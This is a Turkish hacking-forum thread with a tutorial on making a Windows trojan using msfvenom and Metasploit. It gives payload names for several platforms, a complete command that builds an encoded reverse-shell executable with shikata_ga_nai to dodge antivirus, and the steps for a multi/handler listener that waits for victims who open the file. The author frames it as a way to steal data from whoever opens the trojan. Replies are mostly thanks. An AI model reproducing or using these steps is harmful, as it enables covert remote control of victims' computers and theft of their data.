THT DUYURU

chat
Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

ugursuz reklam
takipci
Seçenekler

Msfvenom Aracı İle Port Açmadan Trojan Oluşturma / SeNZeRo

SeNZeRo - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
09/2016
Mesajlar:
5.083
Konular:
477
Teşekkür (Etti):
103
Teşekkür (Aldı):
1721
Ticaret:
(0) %
26
5806
04-11-2018 01:53
#1
Merhaba arkadaşlar. Bugün bir çok kişinin baş belası olan port açma derdini ortadan kaldıracağız. Métasploitin alt dalı olarak sunduğu Msfvenom aracını kullanarak trojan (rat / backdoor) oluşturacağız. Bu işlemi yaparken de port açmayacağız.


Msfvenom Nedir Ve İşe Yarar ?


Msfvenom aracı métasploitin alt dalında yürütülen bir projedir. Daha önceden backdoor oluşturmak için msfpayload aracı kullanılıyordu. Métasploitin msfpayloada verdiği desteğini kesmesi üzerine yeni bir araç olarak msfvenomu çıkarttı. Msfvenom aracı Msfpayload ve Msfencode araçlarının birleşmiş halidir. Bu sayede tek araçla bir çok işi halledebiliyoruz.


Msfvenom aracı hakkında ayrıntılı bilgi için terminale aşağıdaki komutu yazınız.


Kod:
msfvenom -h

Kullanılan bazı parametreler;


-l = Payload, encoder,npos modül tüplerini listeler.
-p = Kullanacağımız payloadı seçmemize yarar.
-f = Çıktının yani oluşturacağımız trojanın hangi türde olacağını seçmemize yarar. Örneğin .exe, dll, asp, vba vs gibi.
-e = Oluşturacağımız trojana bir encoder ekleyerek antivirüslere yakalanmamasını sağlar.
-a = Payloadın çalışacağı mimariyi seçmemize yarar. Desteklenen bazı mimariler x86 and x64, ARM, PPC Sparc dir.
-o = Oluşturduğumuz trojanın nereye çıkacağını belirtmeye yarar.
-b = Kötü karakterleri (bad characters) temizler.
-n = Oluşturulan trojanın başına nopsled ekler.
-s = Oluşturulan trojanın memory alanı boyutunu byte olarak belirleyebiliriz.
-i = Encoding işleminin kaç kez tekrarlanacağını belirtir.
-c = Birleştirilecek shell code' yi belirtmeye yarar.
-k = Birleştirilen dosyanın fonksiyonlarının bozulmasını engeller.


Yukarıda trojanı oluştururken kullandığımız parametreleri listeledim. Şimdi de trojanımızı oluşturmaya geçelim.


Genel olarak trojan oluşturma kodu:

Kod:
msfvenom –p <payload adı> --payload-options (seçtiğimiz payloadın ayarlarını yapmamızı sağlar)

Öncelikle payload türümüzü seçmeliyiz. Hangi sistem için yapacak isek onun payloadını seçmeliyiz. Örnek olarak birkaç payload türü:


Windows


Kod:
-p windows/meterpreter/reverse_tcp
Linux

Kod:
-p linux/x86/meterpreter/reverse_tcp
PHP

Kod:
-p php/meterpreter_reverse_tcp
Python

Kod:
-p cmd/unix/reverse_python
Bash

Kod:
-p cmd/unix/reverse_bash

Andorid


Kod:
–p android/meterpreter/reverse_tcp

Ben örnek olarak windows için .exe bir trojan oluşturacağım. Payloadımızı seçtik -p windows/meterpreter/reverse_tcp Payloadı seçtikten sonra LHOST ve LPORT değerlerini yani trojanı attığımız kişi trojanı açarsa bağlantının hangi ip ye gelmesini istediğimizi yazacağız. Bunun için terminale ifconfig yazarak kendi ip adresimizi alıyoruz.


Bu işlemleri yaptıktan sonra komutumuz şu hale geldi:

Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ipadresimiz LPORT=4444

Bundan sonra konunun başında belirtmiş olduğum komutları kullanarak trojanın ayarlarını istediğiniz şekilde yapabilirsiniz. Ben örnek olarak aşağıdaki şekilde yapacağım.


Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.135.151 LPORT=443 -f exe -a x86 -o /root/Masaüstü/trojan.exe --platform windows -e x86/shikata_ga_nai -i 20

Trojanımızı başarılı bir şekilde oluşturduk. Şimdi de oluşturduğumuz trojanı dinlemeye alalım. Yani trojanı birisi açtığında bağlantının gelmesini sağlayacağız.


Bunun için métasploiti msfconsole yazarak çalıştırıyoruz. Métasploit açıldıktan sonra aşağıdaki adımları izliyoruz.


Alıntı:
use exploit/multi/handler >>> Komutu ile dinleme modülüne giriyoruz.
set payload <seçtiğimiz payload> >>> İlk başta seçtiğimiz payloadı yazıyoruz. Ben windows/meterpreter/reverse_tcp seçmiştim.
set LHOST=<kendi ip adresimizi yazıyoruz> >>> Trojanı oluştururken ifconfig komutu ile aldığımız ip adresimizi yazıyoruz.
set LPORT=443 >>> Yazdığımız portu yazıyoruz.
exploit >>> Dinleme işlemini başlatır.

Böylelikle dinleme moduna almış olduk. Attığımız trojanı birisi açarsa buraya düşecek ve istediğiniz bilgileri alabileceksiniz. Konuya trojan açıldıktan, oturum geldikten sonra neler yapabileceğimizi ve istediğimiz verileri nasıl alabileceğimizi de ekleyeceğim. İyi formlar.
Konu SeNZeRo tarafından (04-11-2018 10:01 Saat 10:01 ) değiştirilmiştir.
нydrαтнαlleѕ - ait Kullanıcı Resmi (Avatar)
İstihbarat Tim (Kıdemli)
Üyelik tarihi:
01/2017
Mesajlar:
2.569
Konular:
161
Teşekkür (Etti):
641
Teşekkür (Aldı):
809
Ticaret:
(0) %
04-11-2018 01:55
#2
elinize sağlık hocam
---------------------
Hatırlatma; Geç yağan yağmurlar, hayat vermez kurumuş çiçeklere..
ch_arli41 - ait Kullanıcı Resmi (Avatar)
Red Team Lideri
Üyelik tarihi:
07/2009
Mesajlar:
1.029
Konular:
79
Teşekkür (Etti):
753
Teşekkür (Aldı):
768
Ticaret:
(0) %
04-11-2018 02:04
#3
Eline sağlık güzel konu
---------------------
oldnco - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
09/2017
Yaş:
30
Mesajlar:
1.530
Konular:
43
Teşekkür (Etti):
637
Teşekkür (Aldı):
371
Ticaret:
(0) %
04-11-2018 02:13
#4
elinize sağlık hocam
--------------------- 💫 Alles wird sehr schön werden
'Creative - ait Kullanıcı Resmi (Avatar)
Hevesli Üye
Üyelik tarihi:
03/2017
Mesajlar:
3.165
Konular:
95
Teşekkür (Etti):
211
Teşekkür (Aldı):
1064
Ticaret:
(0) %
04-11-2018 03:04
#5
Elinize Sağlık Hocam
---------------------
‘’ Hevesli üye yazdığına bakmayın hevesli değilim. Tşk.
Whiteht - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2015
Nereden:
C:/
Mesajlar:
1.348
Konular:
78
Teşekkür (Etti):
273
Teşekkür (Aldı):
246
Ticaret:
(0) %
04-11-2018 04:36
#6
ellerinize sağlık hocam konu bittiğinde sabırsızlıkla denemeyi bekliyorum
--------------------- Adalet ayrı şey Adillik ayrı doğrusu adilliktir adalet değil .
SeNZeRo - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
09/2016
Mesajlar:
5.083
Konular:
477
Teşekkür (Etti):
103
Teşekkür (Aldı):
1721
Ticaret:
(0) %
04-11-2018 11:46
#7
Alıntı:
HydraThalles´isimli üyeden Alıntı Mesajı göster
elinize sağlık hocam
Alıntı:
ch_arli41´isimli üyeden Alıntı Mesajı göster
Eline sağlık güzel konu
Alıntı:
oldnco´isimli üyeden Alıntı Mesajı göster
elinize sağlık hocam
Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık Hocam
Alıntı:
Whiteht´isimli üyeden Alıntı Mesajı göster
ellerinize sağlık hocam konu bittiğinde sabırsızlıkla denemeyi bekliyorum
Teşekkür ederim, sağolun.
GHOST CLOUD - ait Kullanıcı Resmi (Avatar)
Hevesli Üye
Üyelik tarihi:
06/2015
Nereden:
ÖTÜKEN
Mesajlar:
2.534
Konular:
265
Teşekkür (Etti):
282
Teşekkür (Aldı):
553
Ticaret:
(0) %
04-11-2018 11:55
#8
Elinize sağlık hocam.
---------------------
Hiçbir şeye ihtiyacımız yok, yaInız bir şeye ihtiyacımız vardır; çaIışkan oImak!
_____________________________________________

TÜRK
"Tranquila - ait Kullanıcı Resmi (Avatar)
Tamamen Askıya Alındı
Üyelik tarihi:
08/2017
Nereden:
Trabzon
Yaş:
2
Mesajlar:
1.999
Konular:
229
Ticaret:
(0) %
04-11-2018 12:00
#9
ellerine sağlık ihtiyacım vardı
Sontigin - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
09/2018
Nereden:
Ötüken
Mesajlar:
94
Konular:
0
Teşekkür (Etti):
79
Teşekkür (Aldı):
8
Ticaret:
(0) %
04-11-2018 12:16
#10
eline sağlık komutanım

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler